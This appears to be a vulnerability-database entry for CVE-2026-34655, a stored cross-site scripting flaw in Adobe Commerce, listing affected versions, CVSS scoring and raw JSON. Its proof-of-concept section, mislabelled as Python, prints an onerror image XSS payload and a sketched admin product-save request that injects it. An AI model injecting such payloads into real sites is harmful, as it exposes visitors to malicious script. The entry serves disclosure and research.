Security Vulnerability Report
中文
CVE-2026-34655 CVSS 4.8 MEDIUM

CVE-2026-34655

Published: 2026-05-12 20:16:37
Last Modified: 2026-05-13 14:49:12
Source: [email protected]

Description

Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a high-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed.

CVSS Details

CVSS Score
4.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Adobe Commerce <= 2.4.9-beta1
Adobe Commerce <= 2.4.8-p4
Adobe Commerce <= 2.4.7-p9
Adobe Commerce <= 2.4.6-p14
Adobe Commerce <= 2.4.5-p16
Adobe Commerce <= 2.4.4-p17

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// Proof of Concept for Stored XSS in Adobe Commerce // Requires High Privilege (Admin) access to inject // Payload to be injected into a vulnerable form field (e.g., Product Name or Description) var payload = '<img src=x onerror=alert("CVE-2026-34655")>'; // Hypothetical HTTP POST request to inject the payload // POST /admin/catalog/product/save/id/{product_id} /* POST /admin/catalog/product/save HTTP/1.1 Host: target.com Cookie: admin_session=... product[name]=<img src=x onerror=alert("CVE-2026-34655")>& product[description]=Test... */ // When a victim visits the product page, the alert triggers. console.log("Injecting payload: " + payload);

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34655", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:36.607", "lastModified": "2026-05-13T14:49:11.830", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a high-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://helpx.adobe.com/security/products/magento/apsb26-49.html", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.